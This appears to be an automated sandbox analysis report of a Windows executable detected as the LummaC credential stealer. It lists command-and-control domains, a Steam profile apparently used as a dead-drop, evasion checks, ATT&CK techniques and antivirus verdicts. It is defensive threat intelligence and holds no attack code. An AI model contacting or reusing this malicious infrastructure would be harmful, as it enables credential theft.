    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exe, file.exe, 00000000.00000002.1564546528.0000000000888000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: MJProgram Manager
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		2
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping641
    Security Software Discovery    		Remote ServicesData from Local System1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		2
    Process Injection    		LSASS Memory24
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell    		Logon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS223
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe53%VirustotalBrowse
    file.exe100%AviraTR/Crypt.ZPACK.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    steamcommunity.com0%VirustotalBrowse
    sergei-esenin.com18%VirustotalBrowse
    licendfilteo.site16%VirustotalBrowse
    eaglepawnoy.store19%VirustotalBrowse
    spirittunek.store22%VirustotalBrowse
    studennotediw.store18%VirustotalBrowse
    mobbipenju.store22%VirustotalBrowse
    dissapoiznw.store22%VirustotalBrowse
    bathdoomgaz.store22%VirustotalBrowse
    clearancek.site18%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://steamcommunity.com:443/profiles/76561199724331900100%URL Reputationmalware
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
    https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
    https://sergei-esenin.com/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
    https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi0%VirustotalBrowse
    dissapoiznw.store22%VirustotalBrowse
    https://eaglepawnoy.store:443/api22%VirustotalBrowse
    studennotediw.store18%VirustotalBrowse
    https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a0%VirustotalBrowse
    https://sergei-esenin.com/apit3%VirustotalBrowse
    https://sergei-esenin.com:443/api%9%VirustotalBrowse
    https://steamcommunity.com/market/0%VirustotalBrowse
    https://sergei-esenin.com/apiX4%VirustotalBrowse
    eaglepawnoy.store19%VirustotalBrowse
    bathdoomgaz.store22%VirustotalBrowse
    https://sergei-esenin.com:443/api19%VirustotalBrowse
    https://steamcommunity.com/my/wishlist/0%VirustotalBrowse
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%VirustotalBrowse
    https://community.akamai.steamstatic.co0%VirustotalBrowse
    https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319000%VirustotalBrowse
    https://sergei-esenin.com/apiJ9%VirustotalBrowse
    clearancek.site18%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=e0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/shared/css/shared_resp0%VirustotalBrowse
    spirittunek.store22%VirustotalBrowse
    https://steamcommunity.com/discussions/0%VirustotalBrowse
    https://steamcommunity.com/workshop/0%VirustotalBrowse
    licendfilteo.site16%VirustotalBrowse
    https://studennotediw.store:443/api22%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    		104.102.49.254
    		truetrueunknown
    sergei-esenin.com
    		172.67.206.204
    		truetrueunknown
    eaglepawnoy.store
    		unknown
    		unknowntrueunknown
    bathdoomgaz.store
    		unknown
    		unknowntrueunknown
    spirittunek.store
    		unknown
    		unknowntrueunknown
    licendfilteo.site
    		unknown
    		unknowntrueunknown
    studennotediw.store
    		unknown
    		unknowntrueunknown
    mobbipenju.store
    		unknown
    		unknowntrueunknown
    clearancek.site
    		unknown
    		unknowntrueunknown
    dissapoiznw.store
    		unknown
    		unknowntrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    studennotediw.storetrueunknown
    dissapoiznw.storetrueunknown
    https://steamcommunity.com/profiles/76561199724331900true
    • URL Reputation: malware
    		unknown
    eaglepawnoy.storetrueunknown
    bathdoomgaz.storetrueunknown
    clearancek.sitetrueunknown
    spirittunek.storetrueunknown
    licendfilteo.sitetrueunknown
    mobbipenju.storetrue
      		unknown
      https://sergei-esenin.com/apitrue
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://sergei-esenin.com/file.exe, 00000000.00000003.1359433873.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565531432.0000000000CA7000.00000004.00000020.00020000.00000000.sdmptrueunknown
        https://www.cloudflare.com/learning/access-manqqxfile.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPifile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vPfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://eaglepawnoy.store:443/apifile.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstafile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://community.akamfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://steamcommunity.com:443/profiles/76561199724331900file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                https://steamcommunity.com/profiles/76561199724331900S)file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://sergei-esenin.com:443/api%file.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  https://www.cloudflare.com/learning/access-manfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.cloudflare.com/5xx-error-landingfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://sergei-esenin.com/apitoryfile.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      https://sergei-esenin.com:443/apifile.exe, 00000000.00000002.1565088782.0000000000BFE000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&afile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://sergei-esenin.com/apitfile.exe, 00000000.00000002.1565088782.0000000000C10000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://avatars.akamai.steamstaticfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://store.steampowered.com/about/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://help.steampowered.com/en/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://steamcommunity.com/market/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://store.steampowered.com/news/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://sergei-esenin.com/ERfile.exe, 00000000.00000003.1359433873.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1565531432.0000000000CA7000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://sergei-esenin.com/apiXfile.exe, 00000000.00000002.1565088782.0000000000C38000.00000004.00000020.00020000.00000000.sdmptrueunknown
                          https://store.steampowered.com/stats/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359433873.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347379364.0000000000C12000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://sergei-esenin.com/apiJfile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmptrueunknown
                          https://community.akamai.steamstatic.cofile.exe, 00000000.00000003.1347379364.0000000000C49000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.1346961195.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1347206379.0000000000C86000.00000004.00000020.00020000.00000000.sdmpfalseunknown
